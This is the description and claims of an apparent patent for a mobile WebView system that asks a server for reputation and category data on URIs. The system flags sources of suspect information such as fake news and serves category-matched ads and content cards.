Referring now generally to the Figures, and particularly to FIG. 2, FIG.2 is a flowchart of an aspect of the invented method wherein the mobiledevice 10 transmits a request REQ.MSG.001-REQ.MSG.N for intelligenceand/or reputation information to a server 12 and receives a responseRESP.MSG.001-RESP.MSG.N containing intelligence and/or reputationinformation. As used herein, the term “intelligence” comprises andincludes thematic compatibility information, and provides additional andsupplemental information about a resource (a URI.001-URI.N, in anon-limiting example), such that a given application, API, and/orhardware device may provide additional contextual information to theuser, application, API, hardware device concerning the resource. Forexample, a designated URI.001-URI.N may have a classification as a“sports” resource, so a sports related ad, or similar content may beserved to the user, application, API or hardware device. As used herein,the term “reputation” may be based upon one or more ratings applied to adesignated resource by one or more individuals or organizations, forexample by a specific religious organization, or by the American CivilLiberties Union, or by a web safety rating system. In step 2.02 WebViewis launched by the mobile device 10. In step 2.04 the mobile device 10determines whether a choice of a URI.001-URI.N has been made. When themobile device 10 determines that no choice of a URI.001-URI.N has beenmade, the mobile device 10 determines in step 2.06 whether to terminatethe process. When the mobile device 10 determines not to terminate theprocess in step 2.06, the mobile device 10 returns to step 2.04.Alternately, when the mobile device 10 determines to terminate theprocess, the mobile device 10 executes alternate operations in step2.08.

In the alternative, when it is determined in step 2.04 that a URI choicehas been made, the mobile device 10 proceeds to step 2.10, wherein themobile device 10 populates a request message REQ.MSG.001-REQ.MSG.N forintelligence and/or reputation information for transmittal to the server12. In step 2.12 the mobile device 12 transmits the request messageREQ.MSG.001-REQ.MSG.N to the server 12. In step 2.14 it is determinedwhether a response message RESP.MSG.001-RESP.MSG.N is received from theserver 12 containing intelligence and/or reputation information. Whenthe mobile device 10 determines in step 2.14 that no response messageRESP.MSG.001-RESP.MSG.N is received from the server 12, the mobiledevice 10 proceeds to step 2.08, wherein the mobile device executesalternate operations. Alternately, when it is determined in step 2.14that a response message RESP.MSG.001-RESP.MSG.N has been received fromthe server 12, the mobile device 10 renders the response messageRESP.MSG.001-RESP.MSG.N for viewing by a user. In step 2.18 the mobiledevice 10 determines whether to command access to the designatedURI.001-URI.N based upon the contents of the response messageRESP.MSG.001-RESP.MSG.N. When the mobile device 10 determines not tocommand access to the designated URI.001-URI.N, the mobile device 10executes alternate operations in step 2.08. When, in the alternative,the mobile device 10 determines to command access to the designatedURI.001-URI.N, a communications session is initiated with the designatedURI.001-URI.N in step 2.20. The mobile device 10 subsequently proceedsto step 2.08 and executes alternate operations.

Referring now generally to the Figures, and particularly to FIG. 3, FIG.3 is a block diagram of an exemplary request message REQ.MSG.001 fromthe mobile device 10 to the server 12. The exemplary first requestmessage REQ.MSG.001 includes a mobile device address MBL.ADDR as thesending address, the server address SRV.ADDR as the receiving address, afirst URI.001, an intelligence flag FLG.INT, a reputation flag FLG.REP,a first request REQ.001 and optionally one or a plurality of categorymarkers CAT.001-CAT.N.

FIG. 3 presents an exemplary optional inclusion of several categorymarkers, including a pornography category marker CAT.PRN, a spywarecategory marker CAT.SPW, and an exemplary Nth category marker CAT.N.

It is understood that when the intelligence flag FLG.INT is set to an onposition, it is indicated to the server 12 that the request messageREQ.MSG.001 is requesting intelligence, and when the reputation flagFLG.REP is set to an on position, it is indicated to the server 12 thatthe request message REQ.MSG.001 is requesting reputation information.The number or types of categories presented are not to be interpreted asa limitation on the categorization of a particular URI or URI record,and a designated URI or URI record may have or comprise any number ortype of category deemed appropriate or necessary by a user oradministrator.

Referring now generally to the Figures, and particularly to FIG. 4, FIG.4 is a flowchart of an aspect of the invented method wherein the server12 receives a request message REQ.MSG.001-REQ.MSG.N from the mobiledevice and transmits a response RESP.MSG.001-RESP.MSG.N to the mobiledevice 10. In step 4.02 the server 12 determines whether a requestmessage REQ.MSG.001-REQ.MSG.N has been received. When the server 12determines that no request message REQ.MSG.001-REQ.MSG.N has beenreceived, the server 12 proceeds to step 4.04, wherein the server 12determines whether to terminate the process. When the server 12determines to terminate the process. When the server 12 determines instep 4.04 to terminate the process, the server 12 executes alternateoperations in step 4.06. Alternately, when the server 12 determines notto terminate the process, the server 12 returns to step 4.02.

In the alternative, when the server 12 determines that a request messageREQ.MSG.001-REQ.MSG.N has been received, the server 12 proceeds to step4.08, wherein the server 12 determines whether the requestedURI.001-URI.N is contained within a library 12I of the server 12. Whenthe server 12 determines that the requested URI.001-URI.N is not in thelibrary 12I of the server 12, the server 12 executes alternateoperations in step 4.06. Alternately, when the server 12 determines thatthe requested URI.001-URI.N is in the library 12I of the server 12, theserver 12 populates a response RESP.MSG.001-RESP.MSG.N for transmittalto the mobile device 10. In step 4.12, the server 12 transmits theresponse RESP.MSG.001-RESP.MSG.N to the mobile device 10. In step 4.14the server 12 determines whether additional request messagesREQ.MSG.001-REQ.MSG.N have been received. When the server 12 determinesthat additional request messages REQ.MSG.001-REQ.MSG.N have beenreceived, the server 12 re-executes the loop of steps 4.10 through 4.14.Alternately, when the server 12 determines that no additional requestmessages REQ.MSG.001-REQ.MSG.N have been received, the server 12proceeds to step 4.16, wherein the server 12 determines whether accessto a designated URI.001-URI.N has been commanded. When the server 12determines in step 4.16 that access has not been commanded, the server12 executes alternate operations in step 4.06. In the alternative, whenthe server 12 determines that access has not been commanded in step4.16, the server 12 proceeds to step 4.18. In step 4.18, access isgranted to the designated URI.001-URI.N. The server 12 subsequentlyproceeds to step 4.06 and executes alternate operations.

Referring now generally to the Figures, and particularly to FIG. 5, FIG.5 is a block diagram of an exemplary first response message RESP.MSG.001from the server 12 to the mobile device 10 having either intelligenceinformation or reputation information. The exemplary first responsemessage RESP.MSG.001 comprises a server address SRV.ADDR as the sendingaddress; the mobile device address MBL.ADDR as the receiving address; anexemplary first URI.001; an intelligence flag FLG.INT, which indicatesthat the response message RESP.MSG.001 contains intelligence informationwhen the flag FLG.INT is in an on position; a reputation flag FLG.REP,which indicates that the response message RESP.MSG.001 containsreputation information when the flag FLG.REP is in an on position; and aplurality of category markers, including a social network categorymarker CAT.SNW, a politics category marker CAT.POL, and an exemplary Nthcategory marker CAT.N. The number or types of categories presented arenot to be interpreted as a limitation on the categorization of aparticular URI or URI record, and a designated URI or URI record mayhave or comprise any number or type of category deemed appropriate ornecessary by a user or administrator. The exemplary first responsemessage may additionally contain one or more pieces of advertisingcontent ADC.001-ADC.N and/or one or more cards CRD.001-CRD.N relating tothe categories CAT.001-CAT.N contained within the response messageRESP.001-RESP.N. The advertising content ADC.001-ADC.N and the one ormore cards CRD.001-CRD.N may optionally be media content, such as text,or may optionally be multimedia content, such as images, audio, videoand/or interactive displays, used individually and in combination.

Referring now generally to the Figures, and particularly to FIG. 6, FIG.6 is a network diagram showing an electronic communications network 14comprising the server 12 and the mobile device 10, bidirectionallycommunicatively coupled by means of the Internet, as shown in theFigure, or by means of any suitable communications structures, equipmentor systems known in the art.

Referring now generally to the Figures, and particularly to FIG. 7, FIG.7 is a block diagram of the mobile device 10. wherein the mobile device10 comprises: a central processing unit (hereinafter, “CPU”) 10B; a userinput module 10D; a display module 10E; a software bus 10Cbi-directionally communicatively coupled with the CPU 10B, the userinput module 10D, the display module 10E; the software bus 10C isfurther bi-directionally coupled with a network interface 10F, enablingcommunication with alternate computing devices by means of theelectronic communications network 100; and a memory 10G. The mobiledevice software bus 10C facilitates communications between theabove-mentioned components of the mobile device 10. The user inputmodule 10D is preferably a touchscreen input, but may optionally oradditionally be a point-and-click device, and/or an alphanumeric inputdevice.

The memory 10G of the mobile device 10 includes a mobile device softwareoperating system OP.SYS 10H. The mobile device software OP.SYS 10H ofthe mobile device 10 may be selected from freely available, open sourceand/or commercially available operating system software, to include butnot limited to a LINUX™ or UNIX™ or derivative operating system, such asthe DEBIAN™ operating system software as provided by Software in thePublic Interest, Inc. of Indianapolis, Ind.; WINDOWS XP™, or WINDOWS 8™operating system as marketed by Microsoft Corporation of Redmond, Wash.;or the MAC OS X operating system or iPhone G4 OS™ as marketed by Apple,Inc. of Cupertino, Calif. The memory 10G further includes the mobiledevice system software program SW.MBL, a mobile device user input driverUDRV.MBL, a mobile device display driver DIS.MBL, and a mobile devicenetwork interface drive NIF.MBL. Additionally within the memory 10G ofmobile device 10 are a plurality of URIs URI.001-URI.N

The exemplary mobile device system software program SW.MBL is optionallyadapted to enable the mobile device 10 to (a.) generate messages andcommunicate with server 12, (b.) process communicate with and processmessages received from server 12, and (c.) manage the mobile device 10to perform, execute and instantiate all elements, aspects and steps asrequired of the mobile device 10 to practice the invented method in itsvarious preferred embodiments interaction with the server 12, asoutlined in the methods of FIGS. 2, 9, and 15.

Referring now generally to the Figures, and particularly to FIG. 8, FIG.8 is a block diagram of the server 12. wherein the server 12 comprises:a central processing unit (“hereinafter, CPU”) 12B; a user input module12D; a display module 12E; a software bus 12C bi-directionallycommunicatively coupled with the CPU 12B, the user input module 12D, thedisplay module 12E; the software bus 12C is further bi-directionallycoupled with a network interface 12F, enabling communication withalternate computing devices by means of the electronic communicationsnetwork 120; and a memory 12G. The server software bus 12C facilitatescommunications between the above-mentioned components of the server 12.

The memory 12G of the server 12 includes a server software operatingsystem OP.SYS 12H. The server software OP.SYS 12H of the server 12 maybe selected from freely available, open source and/or commerciallyavailable operating system software, to include but not limited to aLINUX™ or UNIX™ or derivative operating system, such as the DEBIAN™operating system software as provided by Software in the PublicInterest, Inc. of Indianapolis, Ind.; WINDOWS XP™, or WINDOWS 8™operating system as marketed by Microsoft Corporation of Redmond, Wash.;or the MAC OS X operating system or iPhone G4 OS™ as marketed by Apple,Inc. of Cupertino, Calif. The memory 12G further includes the serversystem software program SW.SRV, a server user input driver UDRV.SRV, aserver display driver DIS.SRV, and a server network interface driveNIF.SRV. Additionally within the memory 12G of server 12 is a serverdatabase management system 12I (hereinafter “DBMS.SRV 12I), the DBMS.SRV12I containing: a server database DBS.SRV; a URI database DBS.URI, whichcontains a plurality of URI's URI.001-URI.N; a category databaseDBS.CAT, as described in greater detail in reference to FIG. 11; anadvertisement database DBS.ADC, as described in greater detail in thereference to FIG. 12A; and a card database DBS.CRD, as described ingreater detail below in reference to FIG. 13A. The advertisementdatabase DBS.ADC preferably includes a plurality of advertisementcontent markers ADC.001-ADC.N, each associated with one or morecategories CAT.001-CAT.N, which may be transmitted and displayed to auser by means of a response message RESP.MSG.001-RESP.MSG.N. The carddatabase DBS.CRD preferably includes a plurality of cards CRD.001-CRD.N,each associated with one or more categories CAT.001-CAT.N and/or withone or more advertisement content markers ADC.001-ADC.N, and which maybe transmitted and displayed to a user by means of a response messageRESP.MSG.001-RESP.MSG.N.

It is understood that the term “card” as used and applied within thepresent disclosure encompasses the generic meaning of the term of art ofa digitized information storage record or data structure, and moreparticularly further encompasses Cards™ multimedia content files, asmarketed by Twitter, Inc. of San Francisco, Calif. and/or Google Now™personalized information storage and delivery system as offered byGoogle, Inc. of Mountain View, Calif., or other suitable content data ormultimedia content files or documents known in the art. The ad contentADC.001-ADC.N and/or card CRD.001-CRD.N as delivered to the user bymeans of a response message RESP.MSG.001-RESP.MSG.N may optionally oradditionally include a coupon of some conditional or unconditionalmonetary value.

The exemplary server system software program SW. SRV is optionallyadapted to enable the server 12 to (a.) generate messages andcommunicate with mobile device 10, (b.) communicate with and processmessages received from mobile device 10, and (c.) manage the server 12to perform, execute and instantiate all elements, aspects and steps asrequired of the server 12 to practice the invented method in its variouspreferred embodiments and in interaction with the mobile device 10.

Referring now generally to the Figures, and particularly to FIG. 9, FIG.9 is a flow chart of an aspect of the invented method wherein a user mayopt not to receive intelligence or reputation information from theserver 12. In step 9.02 the mobile device 10 launches the WebView. Instep 9.04 the mobile device 10 determines whether a choice of aURI.001-URI.N has been made. When the mobile device 10 determines instep 9.04 the no choice of a URI.001-URI.N has been made, the mobiledevice 10 initiates a communications session in step 9.06. The mobiledevice 10 subsequently executes alternate operations in step 9.08.Alternately, when the mobile device 10 determines in step 9.04 that achoice of a URI.001-URI.N has been made, the mobile device 10 proceedsto step 9.10, wherein the mobile device 10 renders the query for viewingby a user. In step 9.12 the mobile device 10 determines whether totransmit a request message REQ.MSG.001-REQ.MSG.N for reputationinformation to the server 12. When the mobile device 10 determines instep 9.12 to transmit a request message REQ.MSG.001-REQ.MSG.N, themobile device 10 populates the message in step 9.14. Upon execution ofstep 9.14, or when the mobile device 10 determines in step 9.12 not totransmit a request message REQ.MSG.001-REQ.MSG.N for reputationinformation to the server 12, the mobile device proceeds to step 9.16.In step 9.16 the mobile device 10 determines whether to transmit arequest message REQ.MSG.001-REQ.MSG.N for intelligence information tothe server 12. When the mobile device 10 determines in step 9.16 totransmit a request message REQ.MSG.001-REQ.MSG.N, for intelligenceinformation the mobile device 10 populates the message in step 9.18.Upon execution of step 9.18, or when the mobile device 10 determines instep 9.16 not to transmit a request message REQ.MSG.001-REQ.MSG.N forintelligence information to the server 12, the mobile device proceeds tostep 9.20. In step 9.20 the mobile device 10 determines whether aresponse message RESP.MSG.001-RESP.MSG.N has been received from theserver 12. When the mobile device 10 determines in step 9.20 that aresponse message RESP.MSG.001-RESP.MSG.N has been received from theserver 12, the mobile device 10 transmits the request messageREQ.MSG.001-REQ.MSG.N in step 9.22. When the request messageREQ.MSG.001-REQ.MSG.N has been transmitted by the mobile device 10, orwhen the mobile device 10 determines that no response messageRESP.MSG.001-RESP.MSG.N has been received from the server 12, the mobiledevice executes alternate operations in step 9.08.

Referring now generally to the Figures, and particularly to FIG. 10,FIG. 10 is a block diagram of an exemplary first URI record URI.REC.001,wherein the exemplary first URI record URI.REC.001 comprises a URIidentifier URI.ID.001; an intelligence flag FLG.INT; a reputation flagFLG.REP; a URI.001; and a plurality of exemplary category markers: afitness category marker CAT.FIT, a business category marker CAT.BUS, asocial network category marker CAT.SNW, a politics category markerCAT.POL, and an exemplary Nth category marker CAT.N. The number or typesof categories presented are not to be interpreted as a limitation on thecategorization of a particular URI or URI record, and a designated URIor URI record may have or comprise any number or type of category deemedappropriate or necessary by a user or administrator.

Optionally, additionally or alternatively, one or more URI recordsURI.REC.001-URI.REC.N may contain one or more references to associatedwith a software card or a digitized advertisement content, such as afirst card identifier CRAD.ID.001 and/or a first ad content recordidentifier ADC.ID.001 as presented in FIG. 10 as optional elements ofthe exemplary first URI record URI.REC.001.

Referring now generally to the Figures, and particularly to FIG. 11,FIG. 11 is a block diagram of the category database DBS.CAT containedwithin the DBMS.SRV 12I of the server 12. The category database DBS.CATpreferably includes a plurality of category markers CAT.001-CAT.N thatindicate that an information source associated with a category markerCAT.001-CAT.N is considered to be a possible source of suspectinformation, including but not limited to fake news. The plurality ofcategory markers CAT.001-CAT.N include, but not limited are not limitedto, category markers for information having certain qualities or of acertain character or specific characteristics, such as image sharingCAT.IMG, gambling CAT.GMB, relationships CAT.REL, children CAT.KDS,alcohol CAT.ALC, chat rooms CAT.CHT, dating CAT.DTG, lingerie CAT.LNG,sex CAT.SEX, sexual health CAT.SXH, tobacco CAT.TBC, bit torrentsCAT.TRT, app stores CAT.APP, entertainment CAT.ENT, automobiles CAT.CAR,business CAT.BUS, careers CAT.CRR, family and parenting CAT.FAM, fitnessCAT.FIT, food and drink CAT.FDD, hobbies CAT.HOB, gardening CAT.GAR,politics and law CAT.POL, Fake News CAT.FN, Far Right CAT.FR, Far LeftCAT.FL, Satire CAT.SAT, Alternative Right CAT.AR, personal financeCAT.FIN, science CAT.SCI, pets CAT.PET, politically liberal CAT.LIB,politically central CAT.CTR, politically conservative CAT.CON, parodyCAT.PAR, racial supremacist CAT.RAC, white supremacist CAT.WHITE,alt-left CAT.ALEFT, dirtbag left CAT.DRT, and suspect informationCAT.SUSP.

Referring now generally to the Figures, and particularly to FIG. 12A,FIG. 12A is a block diagram of the advertising database DBS.ADCcontained within the DBMS 12I of the server 12, wherein the advertisingcontent ADC.001-ADC.N contained within the advertising database DBS.ADCoptionally, but not necessarily, corresponds with the categoriesCAT.001-CAT.N contained within the category database DBS.CAT. Theadvertising content markers ADC.001-ADC.N may include, but are notlimited to, advertising content markers ADC.001-ADC.N for image sharingADC.IMG, gambling ADC.GMB, relationships ADC.REL, children ADC.KDS,alcohol ADC.ALC, chat rooms ADC.CHT, dating ADC.DTG, lingerie ADC.LNG,sex ADC.SEX, sexual health ADC.SXH, tobacco ADC.TBC, bit torrentsADC.TRT, app stores ADC.APP, entertainment ADC.ENT, automobiles ADC.CAR,email ADC.EML, drugs ADC.DRG, movies ADC.MOV, models ADC.MOD, newsADC.NWS, religion ADC.RLG, social networks ADC.SNW, video sharingADC.VDS, sports ADC.SPR, fashion ADC.FSN, politically liberal ADC.LIB,politically central ADC.CTR, politically conservative ADC.CON, parodyADC.PAR, racial supremacist ADC.RAC, white supremacist ADC.WHITE,alt-left ADC.ALEFT, dirtbag left ADC.DRT, Fake News ADC.FN, Far RightADC.FR, Far Left ADC.FL, Satire ADC.SAT, Alternative Right ADC.AR andsuspect information ADC.SUSP.

Referring now generally to the Figures, and particularly to FIG. 12B,FIG. 12B is a block diagram of an exemplary first advertising contentdatabase record ADC.REC.001, wherein the exemplary first advertisingdatabase content record ADC.REC.001 preferably includes a firstadvertising content identifier ADC.ID.001 by which the exemplary firstadvertising content database record ADC.REC.001 may be identified by themobile device 10 and/or by the server 12; advertising content ADC.001,containing content relating to an advertisement which will preferably berendered for a user, wherein the advertising content ADC.001 mayoptionally be media content, such as text, or may optionally bemultimedia content, such as images, audio, video and/or interactivedisplays, used individually or in combination; and a plurality ofcategories CAT.001-CAT.N by which the exemplary first advertisingcontent record may be classified by the mobile device 10 and/or by theserver 12.

Referring now generally to the Figures, and particularly to FIG. 13A,FIG. 13A is a block diagram of the card database DBS.CRD containedwithin the DBMS.SRV 12I of the server 12. The cards CRD.001-CRD.Ncontained within the card database DBS.CRD optionally, but notnecessarily, correspond with the categories CAT.001-CAT.N containedwithin the category database DBS.CAT and/or with the advertising contentADC.001-ADC.N contained within the advertising database DBS.ADC. Thecards CRD.001-CRD.N contained within the card database DBS.CRD mayoptionally be, but are not limited to, cards CRD.001-CRD.N for imagesharing CRD.IMG, gambling CRD.GMB, relationships CRD.REL, childrenCRD.KDS, alcohol CRD.ALC, chat rooms CRD.CHT, technology CRD.TCH, travelCRD.TRV, real estate CRD.RES, advertising CRD.ADV, anime CRD.ANM, bittorrenting CRD.TRT, application stores CRD.APP, entertainment CRD.ENT,automobiles CRD.CAR, email CRD.EML, fashion CRD.FSN, science CRD.SCI,society CRD.SOC, food and drink CRD.FDD, career CRD.CRR, gardeningCRD.GAR, politics CRD.POL, personal finance CRD.FIN, pornographyCRD.PRN, pets CRD.PET, politically liberal CRD.LIB, politically centralCRD.CTR, politically conservative CRD.CON, parody CRD.PAR, racialsupremacist CRD.RAC, white supremacist CRD.WHITE, alt-left CRD.ALEFT,dirtbag left CRD.DRT, Fake News CRD.FN, Far Right CRD.FR, Far LeftCAT.FL, Satire CRD.SAT, Alternative Right CRD.AR and suspect informationCRD.SUSP.

Referring now generally to the Figures, and particularly to FIG. 13B,FIG. 13B is a block diagram of an exemplary first card recordCRD.REC.001, wherein the exemplary first card record CRD.REC.001preferably includes a card record identifier CRD.ID.001 by which thecard record CRD.REC.001 may be identified to the mobile device 10 and/orto the server 12; card content CRD.001, wherein the card content CRD.001may optionally be media content and/or may optionally be multimediacontent, such as images, audio video, and/or interactive displays, usedindividually or in combination; and a plurality of categoriesCAT.001-CAT.N by which the exemplary first advertising content recordmay be classified by the mobile device 10 and/or by the server 12.

Referring now generally to the Figures, and particularly to FIG. 14,FIG. 14 is a flowchart of an aspect of the invented method wherein theserver 12 transmits advertising content ADC.001-ADC.N and/or cardsCRD.001-CRD.N to the mobile device 10 in a response messageRESP.MSG.001-RESP.MSG.N. In step 14.02 the server 12 determines whethera request message REQ.MSG.001-REQ.MSG.N has been received. When theserver 12 determines that no request message REQ.MSG.001-REQ.MSG.N hasbeen received, the server 12 proceeds to step 14.04, wherein the server12 determines whether to terminate the process. When the server 12determines to terminate the process. When the server 12 determines instep 14.04 to terminate the process, the server 12 executes alternateoperations in step 14.06. Alternately, when the server 12 determines notto terminate the process, the server 12 returns to step 14.02.

In the alternative, when the server 12 determines that a request messageREQ.MSG.001-REQ.MSG.N has been received, the server 12 proceeds to step14.08, wherein the server 12 determines whether the requestedURI.001-URI.N is contained within a library 12I of the server 12. Whenthe server 12 determines that the requested URI.001-URI.N is not in thelibrary 12I of the server 12, the server 12 executes alternateoperations in step 14.06. Alternately, when the server 12 determinesthat the requested URI.001-URI.N is in the library 12I of the server 12,the server 12 determines whether one or more of the categoriesCAT.001-CAT.N in the request message REQ.MSG.001-REQ.MSG.N is containedwithin the category database DBS.CAT. When the server 12 determines thatone or more of the categories CAT.001-CAT.N in the request messageREQ.MSG.001-REQ.MSG.N is contained within the category database DBS.CAT,the server 12 proceeds to step 14.12, wherein the server 12 populate theone or more categories CAT.001-CAT.N to the response messageRESP.MSG.001-RESP.MSG.N. Upon execution of step 14.12, or when theserver determines in step 14.10 that one or more of the categoriesCAT.001-CAT.N in the request message REQ.MSG.001-REQ.MSG.N is notcontained within the category database DBS.CAT, the server 12 proceedsto step 14.14. In step 14.14 the server 12 determines whether one ormore pieces of advertising content ADC.001-ADC.N related to one or moreof the categories CAT.001-CAT.N contained within the request messageREQ.MSG.001-REQ.MSG.N is present within the advertising databaseDBS.ADC. When the server 12 determines that one or more pieces ofadvertising content ADC.001-ADC.N related to one or more of thecategories CAT.001-CAT.N contained within the request messageREQ.MSG.001-REQ.MSG.N is present within the advertising databaseDBS.ADC, the server 12 populates the advertising content ADC.001-ADC.Nto the response message RESP.MSG.001-RESP.MSG.N. Alternately, when theserver 12 determines that no pieces of advertising content ADC.001-ADC.Nrelated to one or more of the categories CAT.001-CAT.N contained withinthe request message REQ.MSG.001-REQ.MSG.N are present within theadvertising database DBS.ADC, or upon execution of step 14.16, theserver 12 proceeds to step 14.18. In step 14.18 the server 12 determineswhether a card CRD.001-CRD.N is present in the card database DBS.CRDrelated to one or more of the categories CAT.001-CAT.N contained withinthe request message REQ.MSG.001-REQ.MSG.N. When the server 12 determinesthat a card CRD.001-CRD.N is present in the card database DBS.CRDrelated to one or more of the categories CAT.001-CAT.N contained withinthe request message REQ.MSG.001-REQ.MSG.N, the server 12 populates thecard CRD.001-CRD.N to the response message RESP.MSG.001-RESP.MSG.N. Inthe alternative, when the server 12 determines that no cardCRD.001-CRD.N is present in the card database DBS.CRD related to one ormore of the categories CAT.001-CAT.N contained within the requestmessage REQ.MSG.001-REQ.MSG.N, or upon execution of step 14.20, theserver 12 proceeds to step 14.22. In step 14.22 the server 12 transmitsthe response message RESP.MSG.001-RESP.MSG.N to the mobile device 10.

In step 14.24 the server 12 determines whether additional requestmessages REQ.MSG.001-REQ.MSG.N have been received from the mobile device10. When the server 12 determines that one or more additional requestmessages REQ.MSG.001-REQ.MSG.N have been received from the mobile device10, the server 12 re-executes the loop of steps 14.10 through 14.24 asnecessary. Alternately, when the server 12 determines that no additionalrequest messages REQ.MSG.001-REQ.MSG.N have been received from themobile device 10, the server 12 proceeds to step 14.26, wherein theserver 12 determines whether access to a designated URI.001-URI.N hasbeen commanded. When the server 12 determines in step 14.26 that accesshas not been commanded, the server 12 executes alternate operations instep 14.06. In the alternative, when the server 12 determines thataccess has not been commanded in step 14.26, the server 12 proceeds tostep 14.28. In step 14.28, access is granted to the designatedURI.001-URI.N. The server 12 subsequently proceeds to step 14.06 andexecutes alternate operations.

Referring now generally to the Figures, and particularly to FIG. 15,FIG. 15 is a flowchart of an aspect of the invented method showing ablown-up aspect of step 2.16 of the method of FIG. 2, wherein the mobiledevice 10 accepts and renders a response message RESP.MSG.001-RESP.MSG.Nfrom the server 12. The mobile device 10 proceeds from step 2.14 to step15.00, wherein the mobile device determines whether a received responsemessage RESP.MSG.001-RESP.MSG.N contains one or more categoriesCAT.001-CAT.N. When it is determined that the received response messageRESP.MSG.001-RESP.MSG.N contains one or more categories CAT.001-CAT.N,the mobile device 10 renders the one or more categories CAT.001-CAT.N.Alternatively, when the mobile device 10 determines that receivedresponse message RESP.MSG.001-RESP.MSG.N does not contain one or morecategories CAT.001-CAT.N, or once the one or more categoriesCAT.001-CAT.N have been rendered, the mobile device 10 proceeds to step15.04. In step 15.04 the mobile device 10 determines whether theresponse message RESP.MSG.001-RESP.MSG.N contains advertising contentADC.001-ADC.N. When the mobile device 10 determines that advertisingcontent ADC.001-ADC.N is contained in the response messageRESP.MSG.001-RESP.MSG.N, the mobile device 10 renders the advertisingcontent ADC.001-ADC.N to the user in step 15.06. In the alternative,when the mobile device 10 determines that no advertising contentADC.001-ADC.N is contained within the response messageRESP.MSG.001-RESP.MSG.N, or upon rendering the advertising contentADC.001-ADC.N, the mobile device proceeds to step 15.08. In step 15.08the mobile device 10 determines whether the response messageRESP.MSG.001-RESP.MSG.N contains card content CRD.001-CRD.N. When themobile device 10 determines that the response messageRESP.MSG.001-RESP.MSG.N contains card content CRD.001-CRD.N, the mobiledevice 10 renders the card content CRD.001-CRD.N to the user in step15.10. After rendering the card content CRD.001-CRD.N, or when themobile device 10 determines that the response messageRESP.MSG.001-RESP.MSG.N does not contain card content CRD.001-CRD.N, themobile device proceeds to step 2.18 of the method of FIG. 2.

Some portions of this description describe the embodiments of theinvention in terms of algorithms and symbolic representations ofoperations on information. These algorithmic descriptions andrepresentations are commonly used by those skilled in the dataprocessing arts to convey the substance of their work effectively toothers skilled in the art. These operations, while describedfunctionally, computationally, or logically, are understood to beimplemented by computer programs or equivalent electrical circuits,microcode, or the like. Furthermore, it has also proven convenient attimes, to refer to these arrangements of operations as modules, withoutloss of generality. The described operations and their associatedmodules may be embodied in software, firmware, hardware, or anycombinations thereof.

Any of the steps, operations, or processes described herein may beperformed or implemented with one or more hardware or software modules,alone or in combination with other devices. In one embodiment, asoftware module is implemented with a computer program productcomprising a non-transitory computer-readable medium containing computerprogram code, which can be executed by a computer processor forperforming any or all of the steps, operations, or processes described.

Embodiments of the invention may also relate to an apparatus forperforming the operations herein. This apparatus may be speciallyconstructed for the required purposes, and/or it may comprise ageneral-purpose computing device selectively activated or reconfiguredby a computer program stored in the computer. Such a computer programmay be stored in a non-transitory, tangible computer readable storagemedium, or any type of media suitable for storing electronicinstructions, which may be coupled to a computer system bus.Furthermore, any computing systems referred to in the specification mayinclude a single processor or may be architectures employing multipleprocessor designs for increased computing capability.

Embodiments of the invention may also relate to a product that isproduced by a computing process described herein. Such a product maycomprise information resulting from a computing process, where theinformation is stored on a non-transitory, tangible computer readablestorage medium and may include any embodiment of a computer programproduct or other data combination described herein.

Finally, the language used in the specification has been principallyselected for readability and instructional purposes, and it may not havebeen selected to delineate or circumscribe the inventive subject matter.It is therefore intended that the scope of the invention be limited notby this detailed description, but rather by any claims that issue on anapplication based herein. Accordingly, the disclosure of the embodimentsof the invention is intended to be illustrative, but not limiting, ofthe scope of the invention, which is set forth in the following claims.

What is claimed is:
 1. A computer-implemented method, the methodimplemented using a mobile device bi-directionally coupled with anelectronic communications network (“the network”), and the mobile devicecomprising a processor coupled to a memory device, the methodcomprising: the mobile device executing a mobile application that isadapted to both receive a universal resource identifier from the networkand to apply the universal resource identifier exclusively within themobile application to access a content from the network, wherein themobile application is enabled to access the content from the networkthrough a WebView of the mobile application; determining whether or notuniversal resource identifier is indicated to be a source of suspectinformation; the mobile application notifying a user of the mobiledevice that the universal resource identifier is indicated to be asource of suspect information; and alerting the user of the mobiledevice if that universal resource identifier is determined to be asource of suspect information.
 2. The method of claim 1, furthercomprising alerting the user of the mobile device that universalresource identifier is determined to be a source of suspect informationprior to downloading content accessible from the universal resourceidentifier.
 3. The method of claim 2, further comprising downloading tothe mobile device as directed by the user content sourced from theuniversal resource identifier after the alerting the user that universalresource identifier is determined to be a source of suspect information.4. The method of claim 1, further comprising a visual indicator toappear in the WebView of the mobile application indicating that theuniversal resource identifier is identified as a source of suspectinformation.
 5. The method of claim 4, wherein the visual indicator usesat least one color to represent that the universal resource identifieris a source of suspect information.
 6. The method of claim 1, furthercomprising storing the content sourced from the universal resourceidentifier and allowing the user to access the information by means ofthe mobile device.
 7. The method of claim 1, wherein determining whetheror not the universal resource identifier that the mobile application hasaccessed or is trying to access is a source of suspect information bywhether or not the universal resource identifier has been classified orlabeled as suspect or alternatively as reliable by a network-accessiblethird party reference.
 8. The method of claim 1, wherein determiningwhether or not the universal resource identifier that the mobileapplication has accessed or is trying to access is a sourced of suspectinformation by whether or not the universal resource identifier has beenclassified or labeled as suspect or alternatively as reliable by aweb-accessible registry.
 9. The method of claim 1, wherein the nativeuniversal resource identifier is a universal resource locator.
 10. Amobile computer system comprising: a processor; and a computer-readablestorage device having encoded thereon computer-executable instructionsthat are executable by the processor to perform functions comprising:receiving a message or instruction indicating a mobile application on amobile computer device coupled to a memory device has accessed or istrying to access content from the internet that is to be embedded orincorporated into the mobile application, wherein the mobile applicationaccesses or tries to access content from the internet through a WebViewof the mobile application; receiving a message or instruction indicatingwhether or not the content that is to be embedded or incorporated intothe mobile application is accessed from a source of suspect information;sending a message indicating that the source of the content that themobile application has accessed or is trying to access a source ofsuspect information; and alerting a user of the mobile computer systemprior to enabling access to the content from the source of suspectinformation that the source of the content is determined to be a sourceof suspect information.
 11. The system of claim 10, further comprisingan aspect wherein sending a message indicating that the source ofcontent that the mobile application has accessed or is trying to accessis suspect causes a visual indicator to appear in the mobile applicationor in the WebView indicating that the source of the content is suspect.12. The system of claim 11, wherein the visual indicator uses at leastone color to represent whether the source of the content is suspect. 13.The system of claim 10, further comprising further comprising storingcontent received from the source of suspect information and allowing theuser to access the content via the mobile application.
 14. The method ofclaim 13, further comprising enabling access to the content by themobile computer device only after receipt of an instruction to enableaccess to the content.
 15. The system of claim 10, wherein the source ofcontent that the mobile application has accessed or is trying to accessis determined to suspect by association of the source of content with auniversal resource identifier of a web page.
